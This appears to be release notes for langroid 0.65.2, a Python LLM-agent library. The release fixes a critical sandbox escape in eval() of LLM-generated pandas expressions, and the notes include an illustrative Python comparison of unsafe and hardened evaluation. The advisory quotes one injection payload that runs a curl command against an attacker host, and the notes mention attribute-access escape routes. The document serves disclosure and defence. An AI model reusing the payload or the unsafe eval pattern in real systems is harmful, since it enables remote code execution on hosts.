This release includes 1 security fix for security teams reviewing exposed deployments.
ReleasePort's take
Version 0.65.2 patches a critical sandbox-escape RCE in TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs by restricting the globals handed to eval().
Why it matters: the advisory is rated critical (CVSS 10.0). Any deployment that calls these APIs with full_eval=True, or that lets LLM-influenced expressions reach them, should upgrade immediately to close the remote code execution path.
Summary
Critical sandbox-escape RCE fixed in TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs via restricted builtins.
Changes in this release
| Type | Severity | Summary | CVE |
|---|---|---|---|
| Security | Critical | Patches critical sandbox-escape RCE in TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs via restricted eval globals. | — |
| Breaking | High | Restricts eval'd expression builtins to a curated safe set, breaking code that relied on full Python builtins (e.g., __import__, open). | — |
Full changelog
0.65.2 — Security release
A critical security patch closing a sandbox-escape → RCE in TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs. Upgrading is strongly recommended for anyone using either of these with full_eval=True, or with any LLM-influenced expression input.
pip install -U langroid
Security fix
Sandbox escape to RCE via incomplete eval() mitigation
Advisory: GHSA-q9p7-wqxg-mrhc — Critical (CVSS 10.0), CWE-94
Both TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs called eval(code, vars, {}) on the LLM-generated expression. The empty locals dict looked sandboxed, but the vars globals dict had no __builtins__ entry, and when that key is missing Python inserts a reference to the full builtins module into the globals before evaluating. So a payload like
__import__('os').system('curl http://attacker.com/pwned')
executed with the privileges of the host process whenever full_eval=True was set. full_eval=True was always meant as an explicit opt-in for trusted input only, but the empty locals dict gave a false sense of containment that the globals dict never actually provided.
Fix: a new safe_eval_globals(local_vars) helper in langroid/utils/pandas_utils.py returns a globals dict whose __builtins__ is restricted to a curated read-only set — constants (True, False, None) plus a small set of safe builtins (abs, all, any, bool, dict, enumerate, float, int, len, list, max, min, range, reversed, round, set, sorted, str, sum, tuple, zip). Both eval call sites now wrap their globals via this helper, so __import__, eval, exec, open, compile, globals, vars, getattr and friends are no longer reachable from inside the eval'd expression — even with full_eval=True.
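The pre-fix and post-fix call shapes side by side, as an added example that is not langroid's own code. safe_eval_globals below is a reconstruction modeled on the description above (assumption: it mirrors the text, not the actual langroid/utils/pandas_utils.py); SAMPLE_VARS, the harmless __import__('os').getpid() stand-in for the curl payload, and has_private_attribute (an AST check in the spirit of sanitize_command's dunder blocking, not a project function) are all constructed for this illustration.

```python
import ast
import builtins

# Assumption: reconstructed from the release notes' description of the helper,
# not langroid's actual implementation.
_SAFE_BUILTIN_NAMES = (
    "abs", "all", "any", "bool", "dict", "enumerate", "float", "int", "len",
    "list", "max", "min", "range", "reversed", "round", "set", "sorted",
    "str", "sum", "tuple", "zip",
)


def safe_eval_globals(local_vars: dict) -> dict:
    """Globals dict whose __builtins__ is a curated allowlist, so eval()
    never falls back to injecting the full builtins module."""
    safe_builtins = {name: getattr(builtins, name) for name in _SAFE_BUILTIN_NAMES}
    safe_builtins.update({"True": True, "False": False, "None": None})
    g = dict(local_vars)            # copy: never hand eval() the caller's dict
    g["__builtins__"] = safe_builtins
    return g


def unsafe_eval(code: str, local_vars: dict):
    """Pre-fix pattern eval(code, vars, {}): globals carry no __builtins__,
    so Python inserts the full builtins module (and mutates local_vars)."""
    return eval(code, local_vars, {})


def hardened_eval(code: str, local_vars: dict):
    """Post-fix pattern: same call shape, globals wrapped by safe_eval_globals."""
    return eval(code, safe_eval_globals(local_vars), {})


def has_private_attribute(code: str) -> bool:
    """Added AST check (not sanitize_command itself): True if the expression
    touches any attribute whose name starts with '_', dunders included."""
    tree = ast.parse(code, mode="eval")
    return any(isinstance(n, ast.Attribute) and n.attr.startswith("_")
               for n in ast.walk(tree))


# Constructed sample data standing in for a DataFrame; no pandas dependency.
SAMPLE_VARS = {"rows": [{"x": 1.5}, {"x": 2.5}, {"x": 2.0}]}
# Harmless stand-in for the advisory's curl payload: proves os is reachable.
PAYLOAD = "__import__('os').getpid()"


def try_eval(evaluator, code: str):
    """('ok', value) on success, ('blocked', exception name) on NameError."""
    try:
        return ("ok", evaluator(code, dict(SAMPLE_VARS)))
    except NameError as exc:
        return ("blocked", type(exc).__name__)


def globals_mutated_by_unsafe_eval() -> bool:
    """Side effect of the old pattern: eval() writes __builtins__ into the dict."""
    g = dict(SAMPLE_VARS)
    unsafe_eval("len(rows)", g)
    return "__builtins__" in g


if __name__ == "__main__":
    print("unsafe  :", try_eval(unsafe_eval, PAYLOAD))      # ('ok', <current pid>)
    print("hardened:", try_eval(hardened_eval, PAYLOAD))    # ('blocked', 'NameError')
    print("benign  :", try_eval(hardened_eval, "round(sum(r['x'] for r in rows), 1)"))
    print("mutated :", globals_mutated_by_unsafe_eval())    # True
    print("dunder  :", has_private_attribute("rows.__class__"))  # True
```

Restricting __builtins__ removes the direct __import__/open/exec primitive, but name lookup is not the only way out of a Python expression: attribute access on any reachable object (the private and dunder names the AST check above flags) is the other classic route. That is why the default path keeps sanitize_command's attribute blocking and why full_eval=True is still documented as trusted-input-only.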
This is in addition to (not instead of) sanitize_command, which continues to gate the default full_eval=False path with its strict AST whitelist (DataFrame-only attribute access, dunder/private attribute blocking, method allowlist, ...).
Reported by @YLChen-007.
Behavior change
Strictly tighter — the eval'd expression no longer has access to Python builtins outside the curated safe set. Typical pandas expressions (df.shape, df.groupby(...).mean(), len(df), sum(df['x']), round(...), etc.) continue to work unchanged. If your application legitimately relied on calling __import__, open, exec, etc. from inside a pandas expression (which it should not), you will now get a NameError.
full_eval=True remains documented as "use only on trusted input" — this release closes the direct __import__-style RCE primitive that previously made that opt-in much more dangerous than it appeared.
Upgrade
pip install -U langroid
Full changelog: 0.65.1...0.65.2
Security Fixes
- GHSA-q9p7-wqxg-mrhc — Critical (CVSS 10.0) sandbox‑escape RCE in TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs; restricted __builtins__ to a safe subset
Earlier breaking changes
- v0.65.3 Raw user messages containing tools registered with `enable_message(..., use=False, handle=True)` are now dropped instead of executed.
- v0.65.1 Rejects additional PostgreSQL-specific obfuscations of dangerous functions like `pg_read_file` in `SQLChatAgent`.
- v0.65.0 Default PDF parser switched from pymupdf4llm to pypdfium2; AGPL dependency removed.
- v0.64.0 Rejects PostgreSQL/SQLite/MSSQL primitives that enable arbitrary file reads.
- v0.64.0 Restricts file‑tool paths to stay within configured `curr_dir`.